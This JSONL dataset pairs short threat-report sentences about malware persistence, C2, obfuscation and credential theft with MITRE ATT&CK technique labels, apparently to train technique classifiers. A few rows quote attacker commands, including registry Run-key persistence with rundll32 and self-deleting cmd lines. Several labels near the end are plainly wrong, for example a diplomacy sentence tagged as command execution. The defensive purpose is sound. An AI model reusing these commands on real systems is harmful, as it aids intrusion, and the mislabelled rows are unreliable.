{"text1":"uses a batch file that modifies Registry keys to launch a DLL into the svchost.exe process.","labels":"['T1112']"}
{"text1":"uses a batch file to kill a security program task and then attempts to remove itself.","labels":"['T1064']"}
{"text1":"uses a batch file to load a DLL into the svchost.exe process.","labels":"['T1055']"}
{"text1":"uses a command-line interface.","labels":"['T1059']"}
{"text1":"uses a command-line interface to interact with systems.","labels":"['T1059']"}
{"text1":"uses a copy of tor2web proxy for HTTPS communications.","labels":"['T1090.003']"}
{"text1":"uses a custom binary protocol for C2 communications.","labels":"['T1095']"}
{"text1":"uses a custom binary protocol to beacon back to its C2 server. It has also used XOR for encrypting communications.","labels":"['T1095']"}
{"text1":"uses a custom command and control protocol that communicates over commonly used ports, and is frequently encapsulated by application layer protocols.","labels":"['T1043', 'T1071']"}
{"text1":"uses a custom command and control protocol that communicates over commonly used ports. The C2 protocol is encapsulated in common application layer protocols.","labels":"['T1043']"}
{"text1":"uses a custom crypter leveraging Microsoft\u2019s CryptoAPI to encrypt C2 traffic.","labels":"['T1573']"}
{"text1":"uses a custom DNS tunneling protocol for C2.","labels":"['T1095']"}
{"text1":"uses a custom encryption algorithm, which consists of XOR and a stream that is similar to the Blum Blum Shub algorithm.","labels":"['T1573']"}
{"text1":"uses a custom encryption algorithm on data sent back to the C2 server over HTTP.","labels":"['T1573']"}
{"text1":"uses a customized XOR algorithm to encrypt C2 communications.","labels":"['T1573']"}
{"text1":"uses a custom packer.","labels":"['T1027.002']"}
{"text1":"uses a custom packing algorithm.","labels":"['T1027.002']"}
{"text1":"uses a custom TCP protocol for C2.","labels":"['T1095']"}
{"text1":"uses a custom UDP protocol to communicate.","labels":"['T1095']"}
{"text1":"uses a dropper called MaoCheng that harvests a stolen digital signature from Adobe Systems.","labels":"['T1553.002']"}
{"text1":"uses AES and a preshared key to decrypt the custom Base64 routine used to encode strings and scripts.","labels":"['T1140']"}
{"text1":"uses AES to encrypt C2 communications.","labels":"['T1573']"}
{"text1":"uses AES to encrypt certain information sent over its C2 channel.","labels":"['T1573']"}
{"text1":"uses AES to encrypt network communication.","labels":"['T1573']"}
{"text1":"uses a hidden directory named .calisto to store data from the victim\u2019s machine before exfiltration.","labels":"['T1074', 'T1564.001']"}
{"text1":"uses a keylogger and steals clipboard contents from victims.","labels":"['T1056']"}
{"text1":"uses a keylogger plugin to gather keystrokes.","labels":"['T1056']"}
{"text1":"uses a keylogger to capture keystrokes.","labels":"['T1056']"}
{"text1":"uses a keylogger to capture keystrokes and location of where the user is typing.","labels":"['T1056']"}
{"text1":"uses a keylogger to capture keystrokes it then sends back to the server after it is stopped.","labels":"['T1056']"}
{"text1":"uses a large list of C2 servers that it cycles through until a successful connection is established.","labels":"['T1008']"}
{"text1":"uses a list of known credentials gathered through credential dumping to guess passwords to accounts as it spreads throughout a network.","labels":"['T1110']"}
{"text1":"uses a modified version of pentesting script wmiexec.vbs, which logs into a remote machine using WMI.","labels":"['T1047']"}
{"text1":"uses a module to execute Mimikatz with PowerShell to perform .","labels":"['T1064', 'T1059.001']"}
{"text1":"uses a module to receive a notification every time a USB mass storage device is inserted into a victim.","labels":"['T1120']"}
{"text1":"uses  and other Active Directory utilities to enumerate hosts.","labels":"['T1018']"}
{"text1":"uses a Port 22 malware variant to modify several Registry keys.","labels":"['T1112']"}
{"text1":"uses a PowerShell script to launch shellcode that retrieves an additional payload.","labels":"['T1059.001']"}
{"text1":"uses AppleScript to create a login item for persistence.","labels":"['T1059.002']"}
{"text1":"uses a simple one-byte XOR method to obfuscate values in the malware.","labels":"['T1027']"}
{"text1":"uses a sophisticated keylogger.","labels":"['T1056']"}
{"text1":"uses a specific port of 443 and can also use ports 53 and 80 for C2. One  variant uses HTTP over port 443 to connect to its C2 server.","labels":"['T1043']"}
{"text1":"uses a tool to infect connected USB devices and transmit itself to air-gapped computers when the infected USB device is inserted.","labels":"['T1091']"}
{"text1":"uses a variation of the XOR cipher to encrypt files before exfiltration.","labels":"['T1486']"}
{"text1":"uses a virus that propagates by infecting executables stored on shared drives.","labels":"['T1080']"}
{"text1":"uses a WMI event subscription to establish persistence.","labels":"['T1546.003']"}
{"text1":"uses Base64 encoding for C2 traffic.","labels":"['T1132']"}
{"text1":"uses Base64 encoding for communication in the message body of an HTTP request.","labels":"['T1132']"}
{"text1":"uses blogs and third-party sites (GitHub, tumbler, and BlogSpot) to avoid DNS-based blocking of their communication to the command and control server.","labels":"['T1102']"}
{"text1":"uses character replacement,  environment variables, and XOR encoding to obfuscate code.","labels":"['T1027']"}
{"text1":"uses cloud based services for C2.","labels":"['T1102']"}
{"text1":"uses cmd.exe and \/bin\/bash to execute commands on the victim\u2019s machine.","labels":"['T1059']"}
{"text1":"uses cmd.exe to execute commands for discovery.","labels":"['T1059']"}
{"text1":"uses cmd.exe to execute commands on the victim\u2019s machine.","labels":"['T1059']"}
{"text1":"uses cmd.exe to execute scripts and commands on the victim\u2019s machine.","labels":"['T1059']"}
{"text1":"uses cmd.exe to run commands for enumerating the host.","labels":"['T1059']"}
{"text1":"uses cmd.exe to set the Registry Run key value. It also has a command to spawn a command shell.","labels":"['T1059']"}
{"text1":"uses COM hijacking as a method of persistence.","labels":"['T1546.015']"}
{"text1":"uses command line for execution.","labels":"['T1059']"}
{"text1":"uses commands such as netsh advfirewall firewall to discover local firewall settings.","labels":"['T1518.001']"}
{"text1":"uses commands such as netsh interface show to discover network interface settings.","labels":"['T1016']"}
{"text1":"uses credential dumpers such as  and  to extract cached credentials from Windows systems.","labels":"['T1003']"}
{"text1":"uses custom base64 encoding to obfuscate HTTP traffic.","labels":"['T1132']"}
{"text1":"uses DLL search order hijacking for persistence by saving itself as ntshrui.dll to the Windows directory so it will load before the legitimate ntshrui.dll saved in the System32 subdirectory.","labels":"['T1574.001']"}
{"text1":"uses DLL side-loading, typically using a digitally signed sample of Kaspersky Anti-Virus (AV) 6.0 for Windows Workstations or McAfee's Outlook Scan About Box to load malicious DLL files.","labels":"['T1574.002']"}
{"text1":"uses DLL side-loading to load malicious programs.","labels":"['T1574.002']"}
{"text1":"uses DNS as its C2 protocol.","labels":"['T1071']"}
{"text1":"uses DNS for C2.","labels":"['T1071']"}
{"text1":"uses DNS for the C2 communications.","labels":"['T1071']"}
{"text1":"uses DNS TXT records for C2.","labels":"['T1071']"}
{"text1":"uses Domain Fronting to disguise the destination of network traffic as another server that is hosted in the same Content Delivery Network (CDN) as the intended desitnation.","labels":"['T1090.004']"}
{"text1":"uses encrypted Windows APIs and also encrypts data using the alternative base64+RC4 or the Caesar cipher.","labels":"['T1027']"}
{"text1":"uses FakeTLS to communicate with its C2 server.","labels":"['T1573']"}
{"text1":"uses fake Transport Layer Security (TLS) to communicate with its C2 server, encoding data with RC4 encryption.","labels":"['T1573']"}
{"text1":"uses file and folder names related to legitimate programs in order to blend in, such as HP, Intel, Adobe, and perflogs.","labels":"['T1036']"}
{"text1":"uses FTP for command and control.","labels":"['T1071']"}
{"text1":"uses GET and POST requests over HTTP or HTTPS for command and control to obtain commands and send ZLIB compressed data back to the C2 server.","labels":"['T1071']"}
{"text1":"uses Google Search to identify C2 servers if its primary C2 method via Twitter is not working.","labels":"['T1008']"}
{"text1":"uses HTTP, HTTPS, FTP, and FTPS to communicate with the C2 server.  can also act as a webserver and listen for inbound HTTP requests through an exposed API.","labels":"['T1071']"}
{"text1":"uses HTTP and HTTPS for C2.","labels":"['T1071']"}
{"text1":"uses HTTP and HTTPS for command and control.","labels":"['T1071']"}
{"text1":"uses HTTP and HTTPS to communicate with the C2 server.","labels":"['T1071']"}
{"text1":"uses HTTP as a transport to communicate with its command server.","labels":"['T1071']"}
{"text1":"uses HTTP for C2.","labels":"['T1071']"}
{"text1":"uses HTTP for C2 communication.","labels":"['T1071']"}
{"text1":"uses HTTP for C2 communications.","labels":"['T1071']"}
{"text1":"uses HTTP for command and control communication.","labels":"['T1071']"}
{"text1":"uses HTTP for communication to the control servers.","labels":"['T1071']"}
{"text1":"uses HTTP for communication with the C2 server.","labels":"['T1071']"}
{"text1":"uses HTTP or HTTPS for C2.","labels":"['T1071']"}
{"text1":"uses HTTP over SSL to communicate commands with the control server.","labels":"['T1071']"}
{"text1":"uses HTTP POST requests with data formatted using a custom protocol.","labels":"['T1095']"}
{"text1":"uses HTTPS, HTTP, and DNS for C2 communications.","labels":"['T1071']"}
{"text1":"uses HTTPS for C2.","labels":"['T1071']"}
{"text1":"uses HTTPS for C2 communications.","labels":"['T1071']"}
{"text1":"uses HTTPS for command and control.","labels":"['T1071']"}
{"text1":"uses HTTPS to communicate with its C2 servers, to get malware updates, modules that perform most of the malware logic and various configuration files.","labels":"['T1071']"}
{"text1":"uses HTTP TCP port 80 and HTTPS TCP port 443 for communications.","labels":"['T1043']"}
{"text1":"uses incoming HTTP requests with a username keyword and commands and handles them as instructions to perform actions.","labels":"['T1071']"}
{"text1":"uses ipconfig \/all and route PRINT to identify network adapter and interface information.","labels":"['T1016']"}
{"text1":"uses malicious documents to deliver remote execution exploits as part of. The group has previously exploited CVE-2017-8570, CVE-2012-1856, CVE-2014-4114, CVE-2017-0199, and CVE-2015-1641.","labels":"['T1203']"}
{"text1":"uses Microsoft\u2019s TechNet Web portal to obtain a dead drop resolver containing an encoded tag with the IP address of a command and control server. It has also obfuscated its C2 traffic as normal traffic to sites such as Github.","labels":"['T1102']"}
{"text1":"uses Microsoft\u2019s TechNet Web portal to obtain an encoded tag containing the IP address of a command and control server and then communicates separately with that IP address for C2. If the C2 server is discovered or shut down, the threat actors can update the encoded IP address on TechNet to maintain control of the victims\u2019 machines.","labels":"['T1104']"}
{"text1":"uses mshta.exe to load its program and files.","labels":"['T1218.005']"}
{"text1":"uses multiple protocols (HTTPS, HTTP, DNS) for its C2 server as fallback channels if communication with one is unsuccessful.","labels":"['T1008']"}
{"text1":"uses multiple techniques to obfuscate strings, including XOR.","labels":"['T1027']"}
{"text1":"uses netstat -ano to search for specific IP address ranges.","labels":"['T1049']"}
{"text1":"uses Pastebin to store its real C2 addresses.","labels":"['T1102']"}
{"text1":"uses port 443 for C2.","labels":"['T1043']"}
{"text1":"uses port 443 for C2 communications.","labels":"['T1043']"}
{"text1":"uses port 46769 for C2.","labels":"['T1571']"}
{"text1":"uses port 8000 and 443 for C2.","labels":"['T1043']"}
{"text1":"uses port 8080 for C2.","labels":"['T1043']"}
{"text1":"uses port 80 for C2.","labels":"['T1043']"}
{"text1":"uses Port Numbers 443 and 80 for the C2 server.","labels":"['T1043']"}
{"text1":"uses ports 447 and 8082 for C2 communications.","labels":"['T1571']"}
{"text1":"uses ports 80, 443, and 8080 for C2.","labels":"['T1043']"}
{"text1":"uses PowerShell for execution.","labels":"['T1059.001']"}
{"text1":"uses PowerShell scripts for execution.","labels":"['T1059.001']"}
{"text1":"uses PowerShell to add a Registry Run key in order to establish persistence.","labels":"['T1547.001']"}
{"text1":"uses PowerView and Pywerview to perform discovery commands such as net user, net group, net local group, etc.","labels":"['T1087']"}
{"text1":"uses public sites such as github.com and sendspace.com to upload files and then download them to victim computers.","labels":"['T1105']"}
{"text1":"uses Putty and VNC for lateral movement.","labels":"['T1021']"}
{"text1":"uses RC4 and Base64 to obfuscate strings.","labels":"['T1027']"}
{"text1":"uses RC4 encryption to obfuscate HTTP traffic.","labels":"['T1573']"}
{"text1":"uses RC4 to encrypt C2 traffic.","labels":"['T1573']"}
{"text1":"uses RC4 to encrypt the message body of HTTP content.","labels":"['T1573']"}
{"text1":"uses RDP to tunnel traffic from a victim environment.","labels":"['T1071']"}
{"text1":"uses reflective DLL injection to inject the malicious library and execute the RAT.","labels":"['T1055']"}
{"text1":"uses reg add to add a Registry Run key for persistence.","labels":"['T1112']"}
{"text1":"uses remote services such as VPN, Citrix, or OWA to persist in an environment.","labels":"['T1133']"}
{"text1":"uses rundll32.exe in a Registry Run key value for execution as part of its persistence mechanism.","labels":"['T1218.011']"}
{"text1":"uses rundll32.exe to execute as part of the Registry Run key it adds: HKEY_CURRENT_USER \\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\\u201dvert\u201d = \u201crundll32.exe c:\\windows\\temp\\pvcu.dll , Qszdez\u201d.","labels":"['T1218.011']"}
{"text1":"uses rundll32.exe to load its DLL.","labels":"['T1218.011']"}
{"text1":"uses Rundll32 for executing the dropper program.","labels":"['T1218.011']"}
{"text1":"uses rundll32 to call an exported function.","labels":"['T1218.011']"}
{"text1":"uses Rundll32 to ensure only a single instance of itself is running at once.","labels":"['T1218.011']"}
{"text1":"uses Rundll32 to load a malicious DLL.","labels":"['T1218.011']"}
{"text1":"uses rundll32 within  entries to execute malicious DLLs.","labels":"['T1218.011']"}
{"text1":"uses run keys for persistence on Windows","labels":"['T1547.001']"}
{"text1":"uses scheduled tasks typically named \"Watchmon Service\" for persistence.","labels":"['T1053.005']"}
{"text1":"uses scripts to enumerate IP ranges on the victim network.  has also issued the command net view \/domain to a  implant to gather information about remote systems on the network.","labels":"['T1018']"}
{"text1":"uses search order hijacking of the Windows executable sysprep.exe to escalate privileges.","labels":"['T1574.001']"}
{"text1":"uses services.exe to register a new autostart service named \"Audit Service\" using a copy of the local lsass.exe file.","labels":"['T1569.002', 'T1543.003']"}
{"text1":"uses single-byte XOR obfuscation to obfuscate many of its files.","labels":"['T1027']"}
{"text1":"uses SSL\/TLS and RC4 to encrypt traffic.","labels":"['T1573']"}
{"text1":"uses SSL to encrypt its communication with its C2 server.","labels":"['T1071']"}
{"text1":"uses steganography to hide backdoors in PNG files, which are also encrypted using the Tiny Encryption Algorithm (TEA).","labels":"['T1027']"}
{"text1":"uses svchost.exe to execute a malicious DLL included in a new service group.","labels":"['T1569.002']"}
{"text1":"uses systeminfo on a victim\u2019s machine.","labels":"['T1082']"}
{"text1":"uses tasklist \/v to check running processes.","labels":"['T1057']"}
{"text1":"uses the API call ShellExecuteW for execution.","labels":"['T1106']"}
{"text1":"uses the Camellia cipher to encrypt communications.","labels":"['T1573']"}
{"text1":"uses the certutil command to decode a payload file.","labels":"['T1140']"}
{"text1":"uses the command line.","labels":"['T1059']"}
{"text1":"uses the command line and rundll32.exe to execute.","labels":"['T1059']"}
{"text1":"uses the command-line interface.","labels":"['T1059']"}
{"text1":"uses the command-line interface to execute arbitrary commands.","labels":"['T1059']"}
{"text1":"uses the command prompt to execute commands on the victim's machine.","labels":"['T1059']"}
{"text1":"uses the command reg query \u201cHKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\InternetSettings\u201d.","labels":"['T1012']"}
{"text1":"uses the Confuser protector to obfuscate an embedded .Net Framework assembly used for C2.  also encodes collected data in hexadecimal format before writing to files on disk and obfuscates strings.","labels":"['T1027']"}
{"text1":"uses the Dropbox API to request two files, one of which is the same file as the one dropped by the malicious email attachment. This is most likely meant to be a mechanism to update the compromised host with a new version of the  malware.","labels":"['T1105']"}
{"text1":"uses the Dropbox cloud storage service for command and control.","labels":"['T1102']"}
{"text1":"uses the email platform, Naver, for C2 communications, leveraging SMTP.","labels":"['T1071']"}
{"text1":"uses the filename owaauth.dll, which is a legitimate file that normally resides in %ProgramFiles%\\Microsoft\\Exchange Server\\ClientAccess\\Owa\\Auth\\; the malicious file by the same name is saved in %ProgramFiles%\\Microsoft\\Exchange Server\\ClientAccess\\Owa\\bin\\.","labels":"['T1036']"}
{"text1":"uses the Invoke-Obfuscation framework to obfuscate their PowerShell and also performs other code obfuscation.","labels":"['T1027']"}
{"text1":"uses the ipconfig \/all command to gather the victim\u2019s IP address.","labels":"['T1016']"}
{"text1":"uses the ipconfig command.","labels":"['T1016']"}
{"text1":"uses the keychaindump project to read securityd memory.","labels":"['T1555.002']"}
{"text1":"uses the Microsoft  utility to list processes running on systems.","labels":"['T1057']"}
{"text1":"uses the native Windows Network Enumeration APIs to interrogate and discover targets in a Windows Active Directory network.","labels":"['T1018']"}
{"text1":"uses the net user command.","labels":"['T1087']"}
{"text1":"uses the Skype API to record audio and video calls. It writes encrypted data to %APPDATA%\\Intel\\Skype.","labels":"['T1123', 'T1125']"}
{"text1":"uses the tasklist to view running processes on the victim\u2019s machine.","labels":"['T1057']"}
{"text1":"uses the Windows API call, CreateProcessW(), to manage execution flow.","labels":"['T1106']"}
{"text1":"uses  to clean up the environment and attempt to prevent detection.","labels":"['T1070.004']"}
{"text1":"uses  to execute a payload or commands on a remote host.","labels":"['T1569.002']"}
{"text1":"uses  to inject shellcode into PowerShell.","labels":"['T1059.001']"}
{"text1":"uses Twitter as a backup C2 method. It also has a module designed to post messages to the Russian VKontakte social media site.","labels":"['T1102']"}
{"text1":"uses variations of a simple XOR encryption routine for C&C communications.","labels":"['T1573']"}
{"text1":"uses various WMI queries to check if the sample is running in a sandbox.","labels":"['T1047']"}
{"text1":"uses VBScripts and batch scripts.","labels":"['T1064']"}
{"text1":"uses VNC to connect into systems.","labels":"['T1021']"}
{"text1":"uses web injects and browser redirection to trick the user into providing their login credentials on a fake or modified web page.","labels":"['T1185']"}
{"text1":"uses Web shells on publicly accessible Web servers to access victim networks.","labels":"['T1505.003']"}
{"text1":"uses WMIC to identify anti-virus products installed on the victim\u2019s machine and to obtain firewall details.","labels":"['T1047', 'T1518.001']"}
{"text1":"uses WMI to check for anti-virus software installed on the system.","labels":"['T1518.001']"}
{"text1":"uses WMI to perform discovery techniques.","labels":"['T1047']"}
{"text1":"uses XOR with random keys for its communications.","labels":"['T1573']"}
{"text1":"uses ZPP, a .NET console program, to compress files with ZIP.","labels":"['T1560']"}
{"text1":"variants can add malicious DLL modules as new services.","labels":"['T1543.003']"}
{"text1":"variants can use ports 443, 8443, and 8080 for communications.","labels":"['T1043']"}
{"text1":"variants have attempted to appear legitimate by using the file names SafeApp.exe and NeutralApp.exe, as well as by adding a new service named OfficeUpdateService.","labels":"['T1036']"}
{"text1":"variants have communicated with C2 servers over HTTP and HTTPS.","labels":"['T1071']"}
{"text1":"Variants of  achieve persistence by using DLL search order hijacking, usually by copying the DLL file to %SYSTEMROOT% (C:\\WINDOWS\\ntshrui.dll).","labels":"['T1574.001']"}
{"text1":"Variants of  encrypt payloads using various XOR ciphers, as well as a custom algorithm that uses the \"srand\" and \"rand\" functions.","labels":"['T1027']"}
{"text1":"Variants of  have added Run Registry keys to establish persistence.","labels":"['T1547.001']"}
{"text1":"Variants of  have used rundll32.exe in Registry values added to establish persistence.","labels":"['T1218.011']"}
{"text1":"variants reported on in 2014 and 2015 used a simple XOR cipher for C2.","labels":"['T1573']"}
{"text1":"Various implementations of  communicate with C2 over HTTP, SMTP, and POP3.","labels":"['T1071']"}
{"text1":"Various  malware enumerates logged-on users.","labels":"['T1033']"}
{"text1":"version of  adds a registry key to HKEY_USERS\\Software\\Microsoft\\Windows\\CurrentVersion\\Run for persistence.","labels":"['T1547.001']"}
{"text1":"versions are signed with various valid certificates; one was likely faked and issued by Comodo for \"Solid Loop Ltd,\" and another was issued for \"Ultimate Computer Support Ltd.\"","labels":"['T1553.002']"}
{"text1":"was added to a legitimate, signed version 5.33 of the CCleaner software and distributed on CCleaner's distribution site.","labels":"['T1195']"}
{"text1":"was distributed through a compromised update to a Tor client with a coin miner payload.","labels":"['T1195']"}
{"text1":"was distributed through torrent file-sharing websites to South Korean victims, using a YouTube video downloader application as a lure.","labels":"['T1189']"}
{"text1":"was likely obfuscated using Invoke-Obfuscation.","labels":"['T1027']"}
{"text1":"When a document is found matching one of the extensions in the configuration,  uploads it to the C2 server.","labels":"['T1020']"}
{"text1":"When it first starts,  crawls the victim's local drives and collects documents with the following extensions: .doc, .docx, .pdf, .ppt, .pptx, and .txt.","labels":"['T1005']"}
{"text1":"When it first starts,  crawls the victim's mapped drives and collects documents with the following extensions: .doc, .docx, .pdf, .ppt, .pptx, and .txt.","labels":"['T1039']"}
{"text1":"will attempt to detect if the infected host is configured to a proxy. If so,  will send beacons via an HTTP POST request; otherwise it will send beacons via UDP\/6000.","labels":"['T1008']"}
{"text1":"will attempt to detect if the infected host is configured to a proxy. If so,  will send beacons via an HTTP POST request; otherwise it will send beacons via UDP\/6000.  will also use HTTP to download resources that contain an IP address and Port Number pair to connect to for further C2. Adversaries can also use  to establish an RDP connection with a controller over TCP\/7519.","labels":"['T1071']"}
{"text1":"will copy files over to Windows Admin Shares (like ADMIN$) as part of lateral movement.","labels":"['T1021.002']"}
{"text1":"will decrypt resources it downloads with HTTP requests by using RC4 with the key \"ScoutEagle.\"","labels":"['T1573']"}
{"text1":"will identify Microsoft Office documents on the victim's computer.","labels":"['T1005']"}
{"text1":"will inject itself into different processes to evade detection. The selection of the target process is influenced by the security software that is installed on the system (Duqu will inject into different processes depending on which security suite is installed on the infected host).","labels":"['T1055']"}
{"text1":"will sleep until after a date\/time value loaded from a .dat file has passed. This allows the RAT to remain dormant until a set date, which could allow a means to regain access if other parts of the actors' toolset are removed from a victim.","labels":"['T1108']"}
{"text1":"will timestomp any files or payloads placed on a target machine to help them blend in.","labels":"['T1070.006']"}
{"text1":"will use an 8-byte XOR key derived from the string HYF54&%9&jkMCXuiS instead if the DES decoding fails.","labels":"['T1573']"}
{"text1":"writes data into the Registry key HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Pniumj.","labels":"['T1112']"}
{"text1":"writes multiple outputs to a TMP file using the >> method.","labels":"['T1074']"}
{"text1":"zips up files before exfiltrating them.","labels":"['T1560']"}
{"text1":"\u2019s installer is obfuscated with a custom crypter to obfuscate the installer.","labels":"['T1027']"}
{"text1":"\u2019s Java payload is encrypted with AES.","labels":"['T1027']"}
{"text1":"\u2019s LSADUMP::DCShadow module can be used to make AD updates by temporarily setting a computer to be a DC.","labels":"['T1207']"}
{"text1":"\u2019s LSADUMP::DCSync, KERBEROS::Golden, and KERBEROS::PTT modules implement the three steps required to extract the krbtgt account hash and create\/use Kerberos tickets.","labels":"['T1550.003']"}
{"text1":"From these reports, we know that the group uses an abundance of tools and tactics, ranging across zero-day exploits targeting common applications such as Java or Microsoft Office, heavy use of spear-phishing attacks, compromising legitimate websites to stage watering-hole attacks, and targeting over a variety of operating systems \u2013 Windows, OSX, Linux, even mobile iOS","labels":"['T1189']"}
{"text1":"We believe this access was abused, for example, by inserting malicious scripts in the country\u2019s official websites in order to conduct watering hole attacks","labels":"['T1189']"}
{"text1":"This targeting of third party organizations to attack further targets is a risky move on the attackers\u2019 part, as it potentially reveals their activity within the compromised third party organizations to the new target (those receiving the malicious documents  Making sense of MuddyWater When we looked at the cluster of activity which consisted of what appeared to be espionage-focused attacks in the Middle East, we were somewhat confused as the previous public reporting had attributed these attacks to FIN7","labels":"['T1189']"}
{"text1":"Online news outlets and general websites were breached and weaponized as a vehicle for watering hole attacks","labels":"['T1189']"}
{"text1":"The payload delivered in these November 2017 attacks using DDE enabled documents was SofacyCarberp, which differs from the Zebrocy downloader delivered in the February 2018 attacks","labels":"['T1189']"}
{"text1":"Like many threat groups, TG-3390 conducts strategic web compromises (SWCs), also known as watering hole attacks, on websites associated with the target organization's vertical or demographic to increase the likelihood of finding victims with relevant information","labels":"['T1189']"}
{"text1":"Threat actors compromise a website used by their target demographic (e.g., compromising a website specializing in oil and gas industry news when targeting the energy vertical)","labels":"['T1189']"}
{"text1":"The malware\u2019s capabilities include taking a system survey, access to the filesystem, executing commands and a reverse shell","labels":"['T1059']"}
{"text1":"This indicates that a human operative was executing commands on a command line style interface, rather than an automated or GUI process","labels":"['T1059']"}
{"text1":"Although MURKYTOP is primarily a command-line reconnaissance tool, it can also be used for lateral movement","labels":"['T1059']"}
{"text1":"After decryption, these 34 commands are plain text with parameters that are space delimited much like a command line","labels":"['T1059']"}
{"text1":"The command and parameter names are hashed before being compared by the binary, making it difficult to recover the original names of commands and parameters","labels":"['T1059']"}
{"text1":"These commands are also executed when the loadconfig command is issued","labels":"['T1059']"}
{"text1":"The loadconfig and state commands are executed during initialization, effectively creating the configuration file if it does not exist and writing the state command to it","labels":"['T1059']"}
{"text1":"Glimpse\u2019s Agent Control Panel showing the interface actors would use to send commands The actor clicks the command to view the results in a popup window named \u201cResult Viewer\u201d","labels":"['T1059']"}
{"text1":"This script relays commands and output between the controller and the system","labels":"['T1059']"}
{"text1":"RemoteCMD: This tool executes commands on remote computers, similar to the PsExec tool","labels":"['T1059']"}
{"text1":"These are in-line with the targeting of the victims witnessed by the attackers using Conmie","labels":"['T1059']"}
{"text1":"Intrusions and campaigns conducted by this group are in-line with PRC goals and self-interest in Taiwan","labels":"['T1059']"}
{"text1":"Figure 3: ALFA TEaM Shell v2-Fake Mail (Default) Figure 4 shows an example email containing the default values the shell","labels":"['T1059']"}
{"text1":"Remexi is a basic back door Trojan that allows attackers to open a remote shell on the computer and execute commands","labels":"['T1059']"}
{"text1":"Though this is unsophisticated, a remote shell does provide a highly flexible and powerful means of remote access in the hands of a skilled attacker","labels":"['T1059']"}
{"text1":"!CMD  Trojan executes a command prompt command","labels":"['T1059']"}
{"text1":"The Trojan will save the output of the command to %TEMP%\\win<random number>.txt and send the contents to the C2 server or \u201cThe length of Cmd result file is ziro!\u201d if the command was unsuccessful","labels":"['T1059']"}
{"text1":"The Visual Basic macro uses the following command line:  cmd \/c expand %TEMP%\\setup.cab -F:* %TEMP% && cd \/d %TEMP% && del \/f \/q setup.cab && uacme.exe  The control server credential information contained in the CAB files is different:   Decoded credential data contained in another ipnet.ini","labels":"['T1059']"}
{"text1":"Remote Shell:  The function above is seen throughout many of the binaries in the Mirage family and is executed when a command is sent from the C&C","labels":"['T1059']"}
{"text1":"It is responsible for executing commands in cmd.exe (later down in the functions, not seen in the screenshot, it looks for cmd.exe and executes it using CreateProcessA)","labels":"['T1059']"}
{"text1":"This ID is sent to the CnC with each request for commands to execute","labels":"['T1059']"}
{"text1":"Supported commands \u201cupload\u201c, \u201cscreenshot\u201c, \u201cExcel\u201c, \u201cOutlook\u201c, \u201crisk\u201c, \u201creboot\u201c, \u201cshutdown\u201c, \u201cclean\u201c","labels":"['T1059']"}
{"text1":"Both create one thread, and each thread is responsible for either downloading and executing the file or running a command line program in the terminal:   Figure 28.\u00a0Commands used for downloading and executing, and running a command in terminal   Figure 29.\u00a0Commands used in uploading and downloading file Figure 30","labels":"['T1059']"}
{"text1":"cmd.exe \/C choice \/C Y \/N \/D Y \/T 2 & Del After sleeping, the Trojan will create a GUID and write it to %APPDATA%\\Windows\\GDI.bin","labels":"['T1059']"}
{"text1":"Otherwise, the Trojan will attempt to parse the response for a command, specifically by splitting the decode response on <> and treating the text to the left of the <> string as the command the text to the right as the command arguments","labels":"['T1059']"}
{"text1":"The malware basically provides a remote CMD\/PowerShell terminal for the attackers, enabling them to execute scripts\/commands and receive the results via HTTP requests","labels":"['T1059']"}
{"text1":"Execute noninteractive commands on multiple hosts at once","labels":"['T1059']"}
{"text1":"Open interactive python shells with auto-completion on the all-in-memory remote python interpreter","labels":"['T1059']"}
{"text1":"Remote shells on Unix & Windows clients have a real tty with all keyboard signals working just like an SSH shell","labels":"['T1059']"}
{"text1":"Figure 1: SpeakUp\u2019s Victim Distribution  Figure 2: SpeakUp\u2019s propagation rate per day Infection Vector The initial infection vector is targeting the recently reported vulnerability in ThinkPHP and uses command injection techniques for uploading a PHP shell that serves and executes a Perl backdoor","labels":"['T1059']"}
{"text1":"Figure 6: SpeakUp receives additional commands to execute, this time in plain text","labels":"['T1059']"}
{"text1":"Command\u00a0execution Command execution can create havoc for victim if the malware developer decides to execute commands in the victim\u2019s device","labels":"['T1059']"}
{"text1":"MURKYTOP: a command-line reconnaissance tool","labels":"['T1059']"}
{"text1":"The summit is the latest in a line of signs of diplomatic outreach from North Korea, following the Panmunjom Declaration for Peace, Prosperity and Unification of the Korean Peninsula between South Korea and North Korea on April 27, 2018","labels":"['T1059']"}
{"text1":"The starred commands are undocumented commands","labels":"['T1059']"}
{"text1":"Its presence on a compromised system allows a threat actor to execute a wide variety of commands, including uploading and downloading files, and spawning a reverse shell","labels":"['T1059']"}
{"text1":"UserInstall.exe will abuse the BITSadmin command-line tool to create a job and launch sidebar.exe","labels":"['T1059']"}
{"text1":"This parameter transmits the agent_id to the C2 server to obtain commands the actor wishes to execute on the compromised system","labels":"['T1059']"}
{"text1":"Figure 2: Sofacy Fysbis capability related leakage through strings Figure 2 shows interactive status \/ feedback strings that can give a defender an initial profile of capabilities","labels":"['T1027']"}
{"text1":"For comparison, if we were to inspect Fysbis \u201cRemoteShell\u201d associated strings in one of the stripped variants, we would only see the following:  Figure 3: Sofacy Fysbis stripped binary string references to RemoteShell capability Compare this with what is available from the non-stripped variant:  Figure 4: Sofacy Fysbis non-stripped binary strings referenes to RemoteShell capability Little static analysis gifts like these can help to speed defender enumeration of capabilities and \u2013 more importantly \u2013 further contribute to correlation and detection across related samples","labels":"['T1027']"}
{"text1":"That malicious dll then loads encrypted shellcode from the binary, which is decrypted and runs the final BUGJUICE payload","labels":"['T1027']"}
{"text1":"Messages are encrypted using AES with a static key","labels":"['T1027']"}
{"text1":"Evidence also supports the hypothesis that there is a encryption plugin for victim files (see below)","labels":"['T1027']"}
{"text1":"Destructive dstr command in BE2 config file Also, on some machines, documents were encrypted, but no related\u00a0plugin could be\u00a0found","labels":"['T1027']"}
{"text1":"It is prepended to the encrypted and encoded message","labels":"['T1027']"}
{"text1":"The headers are XOR encrypted with <hdrXORKey1> and <hdrXORKey2> combined and reversed","labels":"['T1027']"}
{"text1":"Build Tool Most of CARBANAK\u2019s strings are encrypted in order to make analysis more difficult","labels":"['T1027']"}
{"text1":"Tool Type Internal Name Industry Name   Backdoor Poison Frog BONDUPDATER   Backdoor Glimpse Updated BONDUPDATER   Webshell HyperShell TwoFace loader   Webshell HighShell TwoFace payload   Webshell Minion TwoFace payload variant   DNS Hijacking Toolkit webmask Related to DNSpionage     Table 1","labels":"['T1027']"}
